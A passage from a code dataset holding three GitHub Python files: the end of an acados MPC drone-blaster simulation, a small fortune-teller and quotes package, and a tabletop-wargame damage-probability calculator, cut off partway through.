1e1, 1e-2, 1e-2, 1e3, 1e3, 1e3]) # position, euler, velocity, angular velocity, swivel angles, POC.\n Q_t = 10*Q\n R = np.zeros((6, 6))\n np.fill_diagonal(R, [5e-2, 5e-2, 5e-2, 5e-2, 1e-5, 1e-5])\n statesBound = np.array([[-1.5, -1.5, 0, -0.174532925, -0.174532925, -0.349066, -1.0, -1.0, -1.0, -0.0872665, -0.0872665, -0.0872665, -0.174532925, -0.523599, -1.5, -1.5, -2.5],\n [1.5, 1.5, 5.0, 0.174532925, 0.174532925, 0.349066, 1.0, 1.0, 1.0, 0.0872665, 0.0872665, 0.0872665, 1.22173, 0.523599, 1.5, 1.5, 2.5]])\n controlBound = np.array([[0, 0, 0, 0, -0.0872665, -0.0872665], [65, 65, 65, 65, 0.0872665, 0.0872665]])\n b = blasterModel(mass, J, l_x, l_y, N, Tf, yaw_coefficient, Q, R, Q_t, blastThruster, statesBound, controlBound)\n b.generateModel()\n integrator, ocp_solver = b.generateController()\n\n # GENERATE SIMULATION PARAMETERS\n\n solver = Jacobian_POC_Solver(150, 1, 0.000015)\n solver.initialise()\n J_mot, J_eul, J_pos = solver.getJacobians()\n \n nx = 17 \n nu = 6\n Nsim = 500\n simX = np.ndarray((Nsim+1, nx))\n simU = np.ndarray((Nsim, nu))\n\n x0 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n yref = np.array([0.0, 0.0, 3.5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.0, 0, 0, 0, 0, 0.0, 0, 0])\n t = np.linspace(0, Tf/N*Nsim, Nsim+1)\n simX[0, :] = x0\n\n xcurrent = x0 \n \n # u = np.array([17, 17, 17, 17, 0.0, -0.05])\n\n for i in range(Nsim): \n\n t0 = time.time()\n\n ocp_solver.set(0, \"lbx\", xcurrent)\n ocp_solver.set(0, \"ubx\", xcurrent)\n\n ocp_solver.cost_set(0, 'yref', yref)\n \n for k in range(N):\n \n params = np.vstack((np.reshape(J_mot, (J_mot.size, 1), order='F'), np.reshape(J_eul, (J_eul.size, 1), order='F'), np.reshape(J_pos, (J_pos.size, 1), order='F'), 
blastThruster))\n\n ocp_solver.set(k, 'p', params)\n \n\n if k+1 == N: \n\n ocp_solver.cost_set(k+1, 'yref', yref[0:nx])\n\n else: \n\n ocp_solver.cost_set(k+1, 'yref', yref)\n\n status = ocp_solver.solve()\n\n params = np.vstack((np.reshape(J_mot, (J_mot.size, 1), order='F'), np.reshape(J_eul, (J_eul.size, 1), order='F'), np.reshape(J_pos, (J_pos.size, 1), order='F'), 2.2*9.81))\n\n integrator.set('p', params)\n print(xcurrent)\n print(ocp_solver.get_cost())\n print(ocp_solver.get(0, \"u\"))\n\n simU[i,:] = ocp_solver.get(0, \"u\")\n\n # u = np.array([])\n\n # simulate system\n integrator.set(\"x\", xcurrent)\n integrator.set(\"u\", simU[i,:])\n # integrator.set(\"u\", u)\n # integrator.set(\"u\", np.array([22.0725, 22.0725, 22.0725, 22.0725, 0, 0]))\n\n status = integrator.solve()\n if status != 0:\n raise Exception('acados integrator returned status {}. Exiting.'.format(status))\n\n # update state\n xcurrent = integrator.get(\"x\")\n simX[i+1,:] = xcurrent\n\n print(f\"Time per step: {time.time() - t0}\")\n\n plt.plot(t, simX[:, 0], label='x')\n plt.plot(t, simX[:, 1], label='y')\n plt.plot(t, simX[:, 2], label='z')\n plt.legend()\n plt.show()\n plt.plot(t, simX[:, 14], label='POC_{x}')\n plt.plot(t, simX[:, 15], label='POC_{y}')\n plt.plot(t, simX[:, 16], label='POC_{z}')\n plt.legend()\n plt.show()\n\n plt.plot(t, simX[:, 3], label='phi')\n plt.plot(t, simX[:, 4], label='tetha')\n plt.plot(t, simX[:, 5], label='psi')\n plt.legend()\n plt.show()\n\n plt.plot(t, simX[:, 12], label='alpha1')\n plt.plot(t, simX[:, 13], label='alpha2')\n plt.legend()\n plt.show()","repo_name":"sml93/mpc_blaster","sub_path":"src/scripts/simulation_blaster.py","file_name":"simulation_blaster.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29817282971","text":"import random\n\ndef getLifeAdvice(type, seed=None) :\n '''\n Returns a randomized piece of life advice if the second given argument is life advice\n '''\n learning = [\n \"Whatever you do, give it 100%\",\n \"Never stop learning\",\n \"Your thinking changes your life\",\n \"Be kind to people; treat people as you'd like to be treated\",\n \"Starting is the hardest part\"\n ]\n\n detach = [\n \"Forgive and let go\",\n \"You can't control others\",\n \"Find your own happy\",\n \"Don't react, respond\",\n \"Meditate on it\"\n ]\n if seed is not None:\n random.seed(seed)\n\n if (type == \"learning\"):\n return random.choice(learning)\n\n elif (type == \"detach\"):\n return random.choice(detach)\n\n\ndef getCSFortune(question, debug, seed=None):\n '''\n Return CS fortune or debugging help\n '''\n if seed is not None:\n random.seed(seed)\n possibleErrors = [\n \"You forgot a semicolon\",\n \"You forgot to close a bracket\",\n \"You misspelled a keyword\",\n \"Incorrect indentation\",\n \"Incorrect version\",\n \"There is no saving this one\"\n ]\n var = random.random() * 10\n #print(var);\n if var >= 5:\n if debug:\n return random.choice(possibleErrors)\n else:\n days = int(random.random() * 100) + 1\n return \"You are on the right track and will finish your assignment/project in \" + str(days) + \" days.\"\n else:\n return \"You are screwed. Switch major. 
Go next.\"\n\ndef getInspiration(name):\n '''\n Returns inspirational quotes\n '''\n quotes = {\n \"Lemony Snicket\": [\n \"Do the scary thing first, and get scared later.\",\n \"All cannot be lost when there is still so much being found.\",\n \"When things don\\'t go right, go left.\",\n \"Sometimes the things you\\'ve lost can be found again in unexpected places.\"\n ],\n \"Amelia Earhart\": [\n \"The most difficult thing is the decision to act, the rest is merely tenacity.\"\n ],\n \"Angela Bassett\": [\n (\"Don't settle for average. Bring your best to the moment. Then, whether it fails or succeeds, \"\n \"at least you know you gave all you had.\")\n ],\n \"Barbara Elaine Smith\": [\n \"I have stood on a mountain of no\\'s for one yes.\"\n ],\n \"Mary Anne Radmacher\": [\n (\"Courage doesn't always roar. Sometimes courage is a quiet voice at the end of the day saying, \"\n \"\\\"I will try again tomorrow.\\\"\")\n ],\n \"Maya Angelou\": [\n (\"Courage is the most important of all the virtues because without courage, \"\n \"you can't practice any other virtue consistently.\")\n ],\n \"Frederick Douglass\": [\n \"If there is no struggle, there is no progress.\"\n ]\n }\n\n if name in quotes.keys():\n quote = random.choice(quotes.get(name))\n elif name == \"\":\n someName = random.choice(list(quotes.keys()))\n quote = random.choice(quotes.get(someName))\n else:\n print(\"Sorry, we don\\'t seem to have any quotes from anyone by that name yet!\\n\")\n quote = \"NO SUCH AUTHOR\"\n\n return quote\n\n\ndef funny(name):\n '''\n Returns happy/funny quotes\n '''\n quotes = {\n\n \"Steven Wright\": [\"I wish the first word I ever said was the word quote, so right before I die I could say unquote.\"],\n\n \"Issac Asimov\": [\"Though sleep is called our best friend, it is a friend who often keeps us waiting!\"],\n\n \"Leo Tolstoy\": [\"Happiness is an allegory, unhappiness a story.\"],\n\n \"J.K Rowling\": [\"Happiness can be found even in the darkest of times; if only one remembers to turn on the light.\"],\n\n \"Oscar Wilde\": [\"Some cause happiness wherever they go; others, whenever they go.\"],\n\n \"Mark Twain\": [\"When your friends begin to flatter you on how young you look, it's a sure sign you're getting old.\"]\n }\n\n if name in quotes.keys():\n return random.choice(quotes.get(name))\n elif name == \"\":\n return random.choice(quotes.get(random.choice(list(quotes.keys()))))\n else:\n return \"The author doesn't exist\"\n","repo_name":"software-students-fall2022/python-package-exercise-project-3-team-16","sub_path":"src/fortunetelleracs1029/fortuneteller.py","file_name":"fortuneteller.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13646931789","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 5 13:46:46 2023\r\n\r\n@author: pwint\r\n\"\"\"\r\nimport copy as c\r\nimport numpy as np\r\n#import pathlib as pl\r\nimport pprint as pp\r\n\r\ndef ptohit(off,_def,mod=0): # chance to hit with melee weapon\r\n if off-_def>=4:\r\n p=(5+mod)/6\r\n elif off-_def>=1:\r\n p=(4+mod)/6\r\n elif off-_def>=-3:\r\n p=(3+mod)/6\r\n elif off-_def>=-7:\r\n p=(2+mod)/6\r\n else:\r\n p=(1+mod)/6\r\n if p>5/6:\r\n return 5/6\r\n elif p>=1/6:\r\n return p\r\n else:\r\n return 1/6\r\n\r\ndef paim(aim): # chance to hit with missile weapon\r\n if aim>8:\r\n return 0/6\r\n elif aim>=7:\r\n return 1/12\r\n else:\r\n return min((7-aim)/6,5/6)\r\n\r\ndef ptowound(_str,res,mod=0): # chance to wound\r\n 
if _str-res>=2:\r\n p=(5+mod)/6\r\n elif _str-res>=1:\r\n p=(4+mod)/6\r\n elif _str-res>=0:\r\n p=(3+mod)/6\r\n elif _str-res>=-1:\r\n p=(2+mod)/6\r\n else:\r\n p=(1+mod)/6\r\n if p>5/6:\r\n return 5/6\r\n elif p>=1/6:\r\n return p\r\n else:\r\n return 1/6\r\n \r\ndef n_ptoarm(ap,arm): # chance to fail armour save\r\n if ap>arm:\r\n return 6/6\r\n else:\r\n return max(1-(arm-ap)/6,1/6)\r\n \r\navgdmg_me=lambda off,_str,ap,_def,res,arm,hmod=0,wmod=0: ptohit(off,_def,hmod)*ptowound(_str,res,wmod)*n_ptoarm(ap,arm)\r\navgdmg_autohits=lambda n,_str,ap,res,arm,wmod=0:n*ptowound(_str, res,wmod)*n_ptoarm(ap,arm)\r\navgdmg_mi=lambda aim,_str,ap,res,arm,wmod=0: paim(aim)*ptowound(_str, res,wmod)*n_ptoarm(ap, arm)\r\navgdmgpt=lambda dmg,pt: dmg/pt\r\n\r\ndef show_me(l1):\r\n l2=c.copy(np.array(l1).round(2).tolist())\r\n ltest=c.copy([6*[\"def\",\"res\",\"arm\",\"dmg\",\"norm\"]])\r\n for i in range(35):\r\n # ltest.append(l1[0+1]+l1[35+1]+...)\r\n # ltest.append(l1[1+1]+l1[36+1]+...)\r\n #...\r\n # ltest.append(l1[34+1]+l1[69+1]...)\r\n ltemp=[]\r\n if i%7 == 0 and i!=0:\r\n ltest.append(6*['','','','',''])\r\n for j in range(6):\r\n ltemp+=c.copy(l2[i+35*j])\r\n ltest.append(ltemp)\r\n string=6*\"{: >7} {: >5} {: >5} {: >5} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n \r\ndef show_surv_me(l1):\r\n l2=c.copy(np.array(l1).round(2).tolist())\r\n ltest=c.copy([6*[\"off\",\"str\",\"ap\",\"att\",\"norm\"]])\r\n for i in range(35):\r\n # ltest.append(l1[0+1]+l1[35+1]+...)\r\n # ltest.append(l1[1+1]+l1[36+1]+...)\r\n #...\r\n # ltest.append(l1[34+1]+l1[69+1]...)\r\n ltemp=[]\r\n if i%7 == 0 and i!=0:\r\n ltest.append(6*['','','','',''])\r\n for j in range(6):\r\n ltemp+=c.copy(l2[i+35*j])\r\n ltest.append(ltemp)\r\n string=6*\"{: >7} {: >5} {: >5} {: >6} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n \r\ndef show_mi(lret):\r\n ranint=[]\r\n for i in range(0,len(lret),175): # 7 (different arm val) * 5 (different res val) * 5 (different sit) = 175 rows per range interval\r\n ranint.append(lret[i][0])\r\n ltest=[['','','','']+['','','','']+['','','','']+['','','','']+['Range','0','-',ranint[0]]]\r\n ltest.append(['','','','Normal']+['','Move','and','Shoot']+['','Stand','and','Shoot']+['','','Soft','Cover']+['','','Hard','Cover'])\r\n ltest.append(5*[\"res\",\"arm\",\"dmg\",\"norm\"])\r\n for k in range(len(ranint)): # k different range blocks\r\n lround=np.array(lret)[k*175:(k+1)*175].round(2).tolist()\r\n for i in range(int(175/5)): # 5 columns\r\n ltemp=[]\r\n if i%7 == 0 and (i!=0 or k!=0): # insert empty row\r\n ltest.append(5*['','','','',''])\r\n if int(i%175)==0 and k!=0: # new ranged interval\r\n ltest.append(['','','','']+['','','','']+['','','','']+['','','','']+['Range',ranint[k-1],'-',ranint[k]])\r\n ltest.append(['','','','Normal']+['','Move','and','Shoot']+['','Stand','and','Shoot']+['','','Soft','Cover']+['','','Hard','Cover'])\r\n ltest.append(5*[\"res\",\"arm\",\"dmg\",\"norm\"])\r\n for j in range(5): # add row to columns\r\n ltemp+=lround[i+int(175/5)*j][1:] # one column contains 175/5=35 rows\r\n ltest.append(ltemp)\r\n string=5*\"{: >7} {: >5} {: >5} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n \r\ndef show_surv_mi(l1):\r\n #l2=c.copy(np.array(l1).round(2).tolist())\r\n #ltest=[5*[\"\",\"\",\"\",\"\",\"\"]+['','','Aim','Mod','0']]\r\n ltest=[6*[\"aim\",\"str\",\"ap\",\"att\",\"norm\"]]\r\n for k in range(0,1): # aim modifiers\r\n lround=np.array(l1)[k*210:(k+1)*210].round(2).tolist()\r\n for i in range(35):\r\n # 
ltest.append(l1[0+1]+l1[35+1]+...)\r\n # ltest.append(l1[1+1]+l1[36+1]+...)\r\n #...\r\n # ltest.append(l1[34+1]+l1[69+1]...)\r\n ltemp=[]\r\n if i%7 == 0 and i!=0:\r\n ltest.append(6*['','','','',''])\r\n for j in range(6):\r\n ltemp+=lround[i+35*j]#[1:]\r\n ltest.append(ltemp)\r\n '''if k!=2:\r\n ltest.append(6*['','','','',''])\r\n ltest.append(5*[\"\",\"\",\"\",\"\",\"\"]+['','','Aim','Mod',-l1[(k+1)*210][0]])\r\n '''\r\n string=6*\"{: >7} {: >5} {: >5} {: >6} {: >5} \"\r\n for row in ltest:\r\n print(string.format(*row))\r\n\r\n# treat breath as an additional modelpart with 0 attack and auto hits\r\ndef melee(att,off,_str,ap,pt,mw=1,autohits=0,hmod=0,wmod=0,test=False):\r\n l2=[]\r\n if type(att)==list: # extend optional parameters to lists\r\n if type(mw)!=list:\r\n mw=[mw for i in range(len(att))]\r\n if type(autohits)!=list:\r\n autohits=[autohits for i in range(len(att))]\r\n if type(hmod)!=list:\r\n hmod=[hmod for i in range(len(att))]\r\n if type(wmod)!=list:\r\n wmod=[wmod for i in range(len(att))]\r\n for _def in range(2,8):\r\n for res in range(2,7):\r\n for arm in range(0,7):\r\n dmg=0\r\n if type(att)==list: # Multi-part model\r\n for i in range(len(att)):\r\n #dmg+=att[i]*mw[i]*avgdmg_me(off[i],_str[i],ap[i],_def,res,arm,hmod[i],wmod[i])+avgdmg_autohits(autohits[i], _str[i], ap[i], res, arm,wmod=wmod[i])\r\n hits=att[i]*ptohit(off[i], _def,mod=hmod[i])+autohits[i]\r\n wounds=hits*ptowound(_str[i], res,mod=wmod[i])\r\n dmg+=wounds*mw[i]*n_ptoarm(ap[i], arm)\r\n else:\r\n #dmg=att*mw*avgdmg_me(off,_str,ap,_def,res,arm,hmod,wmod)+avgdmg_autohits(autohits, _str, ap, res, arm,wmod)\r\n hits=att*ptohit(off, _def,mod=hmod)+autohits\r\n wounds=hits*ptowound(_str, res,mod=wmod)\r\n dmg=wounds*mw*n_ptoarm(ap, arm)\r\n dmgpt=avgdmgpt(100*dmg,pt)\r\n l2.append([_def,res,arm,dmg,dmgpt])\r\n if test==True:\r\n show_me(l2)\r\n else:\r\n return l2\r\n \r\ndef surv_me(hp,_def,res,arm,pt,aeg=7,reg=7,test=False):\r\n lret=[]\r\n for off in range(2,8):\r\n for _str in range(2,7):\r\n for ap in range(0,7):\r\n #att=hp/((1-(7-min(aeg,reg))/6)*avgdmg_me(off,_str,ap,_def,res,arm))\r\n hits=ptohit(off, _def)\r\n wounds=hits*ptowound(_str, res)\r\n unsavedwounds=wounds*n_ptoarm(ap, arm)\r\n dmg=unsavedwounds*(1-(7-min(aeg,reg))/6)\r\n att=hp/dmg\r\n attpt=10*att/pt\r\n lret.append([off,_str,ap,att,attpt])\r\n if test==True:\r\n show_surv_me(lret)\r\n else:\r\n return lret\r\n \r\ndef missile(ran,att,aim,_str,ap,pt,mw=1,aa=1,acc=False,qtf=False,unw=False,mof=False,sta=False,rel=False,cannon=False,test=False):\r\n l2=[] \r\n if type(att)==list: # extend optional parameters to lists\r\n if type(mw)!=list:\r\n mw=[mw for i in range(len(att))]\r\n if type(aa)!=list:\r\n aa=[aa for i in range(len(att))]\r\n aim_orig=aim\r\n for i in range(2):\r\n aim=aim_orig\r\n # i=0 Short Range, i=1 Long Range\r\n if i== 1 and acc==False:\r\n aim+=1\r\n aim_ran=aim\r\n for j in range(5):\r\n aim=aim_ran\r\n # if j==0:\r\n # Normal, nothing to do\r\n # Move and Shoot\r\n if j==1 and mof==True: # Move or Fire\r\n aim=90\r\n elif j==1 and ((qtf==False and unw==False) or (qtf==True and unw==True)): # qick to fire <=> unwieldy\r\n aim+=1\r\n elif j==1 and (qtf==False and unw==True): # only unwieldy\r\n aim+=2 \r\n # Stand and Shoot\r\n elif j==2 and rel==True: # Reload!\r\n aim=90\r\n elif j==2 and sta==False:\r\n aim+=1\r\n # Soft Cover\r\n elif j==3 and cannon==False:\r\n aim+=1\r\n # Hard Cover\r\n elif j==4 and cannon==False:\r\n aim+=2\r\n for res in range(2,7):\r\n for arm in range(0,7):\r\n dmg=0\r\n if 
type(att)==list: # Multi-part model\r\n for i in range(len(att)):\r\n #dmg+=att[i]*mw[i]*aa[i]*avgdmg_mi(aim, _str[i], ap[i], res, arm)\r\n hits=att[i]*paim(aim)\r\n wounds=hits*aa[i]*ptowound(_str[i], res)\r\n dmg+=wounds*mw[i]*n_ptoarm(ap[i], arm)\r\n else:\r\n #dmg+=att*mw*aa*avgdmg_mi(aim, _str, ap, res, arm)\r\n hits=att*paim(aim)\r\n wounds=hits*aa*ptowound(_str, res)\r\n dmg=wounds*mw*n_ptoarm(ap, arm)\r\n dmgpt=avgdmgpt(100*dmg,pt)\r\n l2.append([ran/(2-i),res,arm,dmg,dmgpt])\r\n if test==True:\r\n show_mi(l2)\r\n else:\r\n return l2\r\n\r\ndef surv_mi(hp,res,arm,pt,aeg=7,reg=7,ht=0,test=False):\r\n lret=[]\r\n #for aimmod in range(0,3): # aimmod really neccessary?\r\n for aim in range(0,6)[::-1]:\r\n for _str in range(2,7):\r\n for ap in range(0,7):\r\n #att=hp/((1-(7-min(aeg,reg))/6)*avgdmg_mi(aim+ht, _str, ap, res, arm))\r\n hits=paim(aim+ht)\r\n wounds=hits*ptowound(_str, res)\r\n unsavedwounds=wounds*n_ptoarm(ap, arm)\r\n dmg=unsavedwounds*(1-(7-min(aeg,reg))/6)\r\n att=hp/dmg\r\n attpt=10*att/pt\r\n lret.append([aim,_str,ap,att,attpt])\r\n if test==True:\r\n show_surv_mi(lret)\r\n else:\r\n return lret\r\n \r\ndef filter2_me(l,_def=-1,res=-1,arm=-1,test=False):\r\n lc=c.copy(l)\r\n lret=[]\r\n for i in range(len(lc)):\r\n if (lc[i][0]==_def or _def==-1) and (lc[i][1]==res or res==-1) and (lc[i][2]==arm or arm==-1):\r\n lret.append(lc[i])\r\n if test==True:\r\n ltest=[[\"def\",\"res\",\"arm\",\"dmg\",\"norm\"]]\r\n ltest.extend(np.array(lret).round(2).tolist())\r\n for row in ltest:\r\n print(\"{: >5} {: >5} {: >5} {: >5} {: >5}\".format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter2_mi(l,res=-1,arm=-1,test=False):\r\n lc=c.copy(l)\r\n lret=[]\r\n for i in range(len(lc)):\r\n if (lc[i][1]==res or res==-1) and (lc[i][2]==arm or arm==-1):\r\n lret.append(lc[i])\r\n if test==True:\r\n show_mi(lret)\r\n else:\r\n return lret\r\n \r\ndef compare2_me(l1,l2,test=False):\r\n arra=np.array(l1)[:,3:] # get dmg and norm from l1\r\n arrb=np.array(l2)[:,3:] # get dmg and norm from l2\r\n if (arrb>0).all:\r\n arrc=(arra/arrb).copy() # calculates relative dmg/norm\r\n arrc=np.concatenate((np.array(l1)[:,:3],arrc),1)\r\n lret = arrc.tolist()\r\n if test==True:\r\n show_me(lret)\r\n else:\r\n return lret\r\n \r\ndef compare2_mi(l1,l2,test=False):\r\n arra=np.array(l1)[:,3:] # get dmg and norm from l1\r\n arrb=np.array(l2)[:,3:] # get dmg and norm from l2\r\n ranint=np.sort(np.array([l1[0][0],l1[-1][0],l2[0][0],l2[-1][0]])).tolist() # range intervals\r\n for i in ranint:\r\n if ranint.count(i)>1: # remove redunant numbers\r\n ranint.remove(i)\r\n aret=np.array([0 for i in range(5)])[None,:] # placeholder\r\n for i in ranint: # range intervals\r\n if l1[0][0]>=i: # Short Range\r\n if l2[0][0]>=i: # Short Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[:int(len(l1)/2)]/arrb[:int(len(l1)/2)]),1)\r\n elif l2[-1][0]>=i: # Long Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[:int(len(l1)/2)]/arrb[int(len(l1)/2):]),1)\r\n else: # Not in Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[:int(len(l1)/2)]/np.array([[0,0] for i in range(int(len(l1)/2))])),1)\r\n elif l1[-1][0]>=i: # Long Range\r\n if l2[0][0]>=i: # Short Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[int(len(l1)/2):]/arrb[:int(len(l1)/2)]),1)\r\n elif l2[-1][0]>=i: # Long Range\r\n 
atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[int(len(l1)/2):]/arrb[int(len(l1)/2):]),1)\r\n else: # Not in Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],arra[int(len(l1)/2):]/np.array([[0,0] for i in range(int(len(l1)/2))])),1)\r\n else: # Not in Range\r\n if l2[0][0]>=i: # Short Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],np.array([[0,0] for i in range(int(len(l1)/2))])/arrb[:int(len(l1)/2)]),1)\r\n elif l2[-1][0]>=i: # Long Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],np.array([[0,0] for i in range(int(len(l1)/2))])/arrb[int(len(l1)/2):]),1)\r\n else: # Not in Range\r\n atemp=np.concatenate(([[i] for j in range(int(len(l1)/2))],np.array(l1)[:int(len(l1)/2),1:3],np.array([[0,0] for i in range(int(len(l1)/2))])/np.array([[0,0] for i in range(int(len(l1)/2))])),1)\r\n aret=np.concatenate((aret,atemp))\r\n lret = aret.tolist()[1:] # remove placeholder\r\n if test==True:\r\n show_mi(lret)\r\n else:\r\n return lret\r\n \r\ndef sorteff(l1,test=False):\r\n order=np.array(l1)[:,4].argsort(0)\r\n lret=[]\r\n for i in range(len(l1)):\r\n lret.append(l1[order[i]])\r\n lret=np.array(lret)[::-1,:].tolist()\r\n if test==True:\r\n show_me(lret)\r\n else:\r\n return lret\r\n\r\ndef compare_me(l1,l2,test=False):\r\n lnorm=np.array([[] for i in range(len(l1[0]))])\r\n for mat in l1:\r\n lnorm=np.concatenate((lnorm,np.array(mat)[:,4,None]),1)\r\n order=lnorm.argsort()\r\n order3=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lret=np.concatenate((np.array(l1)[0,:,:3],np.array(order3)),1).tolist()\r\n for i in range(len(lret)):\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lret[i][3+3*j]=l2[int(order3[i][3*j])]\r\n lret[i][3+3*j+1]=l1[int(order3[i][3*j+1])][i][3]\r\n lret[i][3+3*j+2]=(np.array(l1[int(order3[i][3*j+2])][i][4])/np.array(l1[int(order3[i][3*0+2])][i][4])).tolist() # determine cost effectiveness\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n \r\n ltest=[[\"def\",\"res\",\"arm\"]]\r\n ltest[0].extend(len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n k=0\r\n for row in ltest:\r\n print(string.format(*row))\r\n if k%7==0 and k!=0:\r\n print()\r\n k+=1\r\n else:\r\n return lret\r\n\r\ndef compare_surv_me(l1,l2,test=False):\r\n lnorm=np.array([[] for i in range(len(l1[0]))])\r\n for mat in l1:\r\n lnorm=np.concatenate((lnorm,np.array(mat)[:,4,None]),1)\r\n order=lnorm.argsort()\r\n order3=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n 
lret=np.concatenate((np.array(l1)[0,:,:3],np.array(order3)),1).tolist()\r\n for i in range(len(lret)):\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lret[i][3+3*j]=l2[int(order3[i][3*j])]\r\n lret[i][3+3*j+1]=l1[int(order3[i][3*j+1])][i][3]\r\n lret[i][3+3*j+2]=(np.array(l1[int(order3[i][3*j+2])][i][4])/np.array(l1[int(order3[i][3*0+2])][i][4])).tolist() # determine cost effectiveness\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n \r\n ltest=[[\"off\",\"str\",\"ap\"]]\r\n ltest[0].extend(len(l1)*[\"unit\",\"att\",\"eff\"])\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n k=0\r\n for row in ltest:\r\n print(string.format(*row))\r\n if k%7==0 and k!=0:\r\n print()\r\n k+=1\r\n else:\r\n return lret\r\n\r\ndef compare_mi(l1,l2,test=False):\r\n aval=np.array(l1)\r\n aranint=aval[:,:,0] # get ranges from all units: [[sr0,sr0,...,lr0],[sr1,...,lr1],...[srm,...lrm]]\r\n lranint=np.unique(np.concatenate((np.sort(aranint.min(1)),np.sort(aranint.max(1))))).tolist() # sorted ranges\r\n lret=[]\r\n for ran in lranint:\r\n #anorm=np.array([[] for i in range(175)])\r\n anorm=np.array([[[],[]] for i in range(175)])\r\n for unit in range(len(l1)):\r\n if aranint[unit,0]>= ran: # Short Range\r\n anorm=np.concatenate((anorm, aval[unit,:175,3:,None]),2) # dmg+norm from Short Range\r\n elif aranint[unit,-1]>=ran: # Long Range\r\n anorm=np.concatenate((anorm, aval[unit,175:,3:,None]),2) # dmg+norm from Long Range\r\n else: # Out of Range\r\n anorm=np.concatenate((anorm, [[[0],[0]] for i in range(175)]),2)\r\n order=anorm[:,1].argsort() # order of norm\r\n order3=np.array([[] for i in range(175)]) # expand order\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lran=np.concatenate(([[ran] for i in range(175)],np.array(l1)[0,:175,1:3],np.array(order3)),1).tolist()\r\n for i in range(len(lran)): # row i\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lran[i][3+3*j]=l2[int(order3[i][3*j])] # unit name\r\n lran[i][3+3*j+1]=anorm[i,0,int(order3[i][3*j+1])] # dmg\r\n lran[i][3+3*j+2]=anorm[i,1,int(order3[i][3*j+2])]/anorm[i,1,int(order3[i][3*0+2])] # determine cost effectiveness\r\n lret+=lran # add range block\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n # Header\r\n #ltest=[]\r\n ltest=[['','']+(len(l1)-1)*['','','']+['0','-',lranint[0]]]\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','','Normal'])\r\n ltest.append([\"res\",\"arm\"]+len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n for k in range(len(lranint)):\r\n #lran2=lret[k*175:(k+1)*175]\r\n for i in range(175):\r\n if i%7 == 0 and (i!=0 or k!=0): # insert empty row\r\n 
